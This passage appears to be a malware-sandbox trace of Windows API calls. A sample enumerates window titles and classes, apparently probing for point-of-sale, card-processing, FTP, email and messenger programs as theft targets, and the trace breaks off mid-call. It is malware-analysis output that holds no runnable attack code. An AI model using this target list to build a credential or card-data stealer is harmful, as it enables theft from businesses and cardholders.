returned 0 [0203.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.274] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0203.296] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.296] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0203.297] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.297] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0203.297] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.297] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.297] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.298] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.298] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.298] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.298] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.298] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.299] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.299] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.299] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.299] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.299] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.300] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.300] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.300] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.300] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.300] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.300] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.300] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0203.300] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0203.301] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0203.301] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.301] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.301] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.301] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0203.301] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0203.302] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0203.302] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0203.302] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.302] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.302] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0203.302] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0203.302] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.303] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0203.303] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.303] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0203.303] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0203.303] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0203.303] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0203.303] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0203.304] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0203.304] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0203.304] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0203.304] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0203.304] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0203.304] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0203.304] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0203.305] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0203.305] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0203.305] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0203.305] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0203.305] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0203.305] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.306] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.306] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0203.306] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0203.306] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0203.306] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0203.307] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0203.307] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0203.307] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0203.307] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0203.307] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0203.308] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0203.308] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0203.308] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0203.308] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0203.308] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0203.308] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0203.308] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0203.309] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0203.309] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0203.309] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0203.309] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0203.310] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0203.310] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0203.310] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0203.310] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0203.310] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0203.310] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0203.310] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0203.311] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0203.311] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0203.311] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0203.311] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0203.311] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0203.311] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0203.312] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0203.312] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0203.312] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0203.312] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0203.312] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0203.312] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0203.312] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0203.313] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0203.313] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0203.313] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0203.313] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0203.313] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0203.313] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0203.313] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0203.314] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0203.314] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0203.314] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0203.314] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0203.314] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0203.314] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0203.315] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0203.315] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0203.315] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0203.315] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0203.315] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0203.315] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0203.315] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0203.316] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0203.316] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0203.316] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0203.316] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0203.316] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0203.316] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0203.316] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0203.317] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0203.317] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0203.317] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0203.317] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0203.317] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0203.318] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0203.318] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0203.318] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0203.318] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0203.318] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.318] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.319] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0203.319] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0203.319] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0203.319] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0203.319] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0203.320] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0203.320] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0203.320] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0203.320] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0203.320] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0203.320] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0203.320] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0203.321] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0203.321] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0203.321] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0203.321] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0203.321] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0203.321] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0203.321] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0203.322] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0203.322] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0203.322] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0203.322] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0203.322] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0203.322] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0203.323] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0203.323] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0203.323] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0203.323] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0203.323] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0203.323] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0203.323] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0203.324] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0203.371] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0203.371] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0203.371] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0203.372] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0203.372] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0203.372] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.372] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.372] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.372] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.372] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.373] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.373] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.373] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.373] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0203.373] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0203.373] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.374] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.374] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.374] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.374] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0203.374] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0203.374] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.374] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0203.375] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.375] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0203.375] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.375] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.375] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.375] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.375] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.376] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0203.376] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.376] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.376] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0203.376] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0203.376] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.376] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.377] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0203.377] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0203.377] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0203.377] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0203.377] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.377] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.378] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, 